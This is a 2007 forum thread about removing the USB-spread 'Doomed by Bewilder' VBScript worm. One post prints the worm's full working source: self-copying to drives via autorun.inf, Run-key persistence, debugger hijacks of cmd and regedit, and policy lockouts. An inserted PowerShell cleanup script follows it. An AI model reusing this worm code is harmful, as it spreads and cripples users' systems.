CMD and REGEDIT open with Notepad!

Discussion in 'Security and Viruses' started by nailv, Oct 23, 2007.

  1. nailv
    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    Hi,

    How can I remove the changes caused by a virus? Something with a double extension, *.dll.vbs??

    I used the RRT and it removed the restrictions on Run, Task Manager & Folder Options, but CMD and regedit still open with Notepad!

    I wonder... I updated my McAfee and ran a full scan on the flash drive I have inserted, but it found nothing.

    My PC was infected right after I removed the flash drive from my computer.
  3. Raymond
    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    Did you install the script from this article?
    http://www.raymond.cc/blog/archives/2007/07/01/stop-virus-from-running-automatically-when-you-execute-files/

    It should fix .bat, .com, .exe, .pif, .reg and .scr files. It will also re-enable your registry editor (regedit).

    Looks like you have an infected USB flash drive. Make sure you clean the virus from your USB flash drive first.
  4. nailv
    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    Yes, I did. I copied the script from the page, pasted it into Notepad and saved it on my desktop, then I right-clicked it and clicked "Install". I also restarted my PC.

    But how come it is still the same? Nothing happens.
    regedit.exe and cmd still open with Notepad. Damn.

    I also ran the RRT.
  5. Raymond
    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    If the problem still comes back after a restart, I suspect that there is still a virus on your computer that's causing it.

    You can do this to verify.
    Install the script again. Then run regedit and go to these locations:
    HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
    HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
    HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

    Check if the value is "%1" %*. If it's correct, restart.
    Once your computer is booted up, run regedit again and check the values.
  6. nailv
    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    It is STILL THE SAME.... even if I go into Safe Mode and install the script again.
    I still cannot open the registry, command prompt and msconfig.

    I restarted my PC many times to no avail. I already removed the VBScript file type in Folder Options.

    Also, IE's title bar has the phrase "Doomed by Bewilder".

    I DON'T want to reformat my PC. Please help me out...
  7. nailv
    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    This is the script of the virus:

    Code:
    'Sting C
    on error resume next
    dim winpath,mysource,fs,atr,flashdrive,check,mf,tf,rg,nt,sd
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe wpzcon32.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    do
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\wpzcon32.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\wpzcon32.dll.vbs",2,true)
    tf.write mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    end if
    next
    set rg = createobject("WScript.Shell")
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WPZCON32",winpath&"\wpzcon32.dll.vbs"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Doomed by Bewilder"
    rg.regwrite "HKEY_CURRENT_USER\vbsfile\DefaultIcon","shell32.dll,2"
    rg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon","shell32.dll,2"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden","0","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Don't Worry... Be Happy..."
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bewilder"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeCaption","Bewilder"
    rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeText","Doomed by Bewilder"
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check<>1
    set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
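The posted script explains why the file-association fix from the article (post 3) and the values checked in post 5 never helped: cmd.exe, regedit.exe and msconfig.exe open in Notepad because of Image File Execution Options "Debugger" values, and the Windows-folder copy re-applies those values, the Policies lockouts and the Run entry every 200 seconds in an endless loop. The PowerShell audit below is an added example, not code from the thread or from raymond.cc; it lists (and with -Fix removes) exactly the values the posted script writes, and assumes the running wscript.exe copy has already been ended and the dropped files deleted.

```powershell
# Added example: audit (and with -Fix undo) the registry changes made by the
# wpzcon32.dll.vbs script posted above. Run from an elevated PowerShell prompt.
param([switch]$Fix)

# 1. IFEO "Debugger" values: this is what makes cmd/regedit/msconfig open in Notepad.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$hijacked = 'cmd.exe','install.exe','msconfig.exe','regedit.exe',
            'regedt32.exe','RegistryEditor.exe','setup.exe'
foreach ($exe in $hijacked) {
    $key = Join-Path $ifeo $exe
    if (-not (Test-Path $key)) { continue }
    $dbg = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        Write-Output "IFEO hijack: $exe -> $dbg"
        if ($Fix) { Remove-ItemProperty -Path $key -Name Debugger }
    }
}

# 2. Policy values the script sets to 1 (Run box, Search, Folder Options, regedit, Task Manager).
$policies = @{
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' = 'NoRun','NoFind','NoFolderOptions'
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'   = 'DisableRegistryTools','DisableTaskMgr'
}
foreach ($key in $policies.Keys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($name in $policies[$key]) {
        $v = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
        if ($v -eq 1) {
            Write-Output "Policy lockout: $key\$name = $v"
            if ($Fix) { Remove-ItemProperty -Path $key -Name $name }
        }
    }
}

# 3. Run-key persistence and the "Doomed by Bewilder" IE title from the script.
$run = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$runVal = (Get-ItemProperty -Path $run -Name WPZCON32 -ErrorAction SilentlyContinue).WPZCON32
if ($runVal) {
    Write-Output "Run persistence: WPZCON32 -> $runVal"
    if ($Fix) { Remove-ItemProperty -Path $run -Name WPZCON32 }
}
$ie = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$title = (Get-ItemProperty -Path $ie -Name 'Window Title' -ErrorAction SilentlyContinue).'Window Title'
if ($title) {
    Write-Output "IE title bar tag: $title"
    if ($Fix) { Remove-ItemProperty -Path $ie -Name 'Window Title' }
}
```

Because the copy started from a fixed drive stays in its do...loop (check<>1) and rewrites everything every 200 seconds, end wscript.exe and delete %WINDIR%\wpzcon32.dll.vbs plus the wpzcon32.dll.vbs/autorun.inf pair on each drive root before running with -Fix, or the values simply come back after the next cycle.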
  8. Raymond
    Raymond Administrator Staff Member

    Joined:
    Nov 6, 2006
    Messages:
    8,845
    Trophy Points:
    280
    Ratings:
    +72 / 0 / -1
    Why can't I find any information about this Bewilder virus?
    nailv, may I know where you got that code from?
  9. nailv
    nailv New Member

    Joined:
    Oct 17, 2007
    Messages:
    15
    Trophy Points:
    4
    Ratings:
    +0 / 0 / -0
    I found it on C: of my colleague's PC. The virus was actually from removable flash drives.

    I think every USB flash drive is inhabited by viruses, usually written in VBScript.
    Damn.

    Edit: Whew! At last! I've fixed it already.

    Thanks to the expert folks on other forums.
  10. CloudJay
    CloudJay New Member

    Joined:
    Jun 28, 2008
    Messages:
    1
    Trophy Points:
    1
    Ratings:
    +0 / 0 / -0
    Hi Raymond. I think I have the same problem with my laptop :( . The title bar on my Internet Explorer has a "Doomed by Bewilder" thing. And the Notepad thing too. I've already fixed the Task Manager. Please help me, I am desperately needing your help Raymond because I'm a noob in computers. I cannot understand those complicated instructions that you have already given to fix my problems. What should I do? Please help me by instructing me step by step what to do. Thanks Raymond :)
  11. brayden
    brayden Prominent Member

    Joined:
    Jun 12, 2008
    Messages:
    3,700
    Trophy Points:
    166
    Ratings:
    +0 / 0 / -0
    Try downloading winsecret from the freebies giveaway topic in Latest Releases, and when you have finished downloading it, run it, go to Applications and you can change the title in Internet Explorer.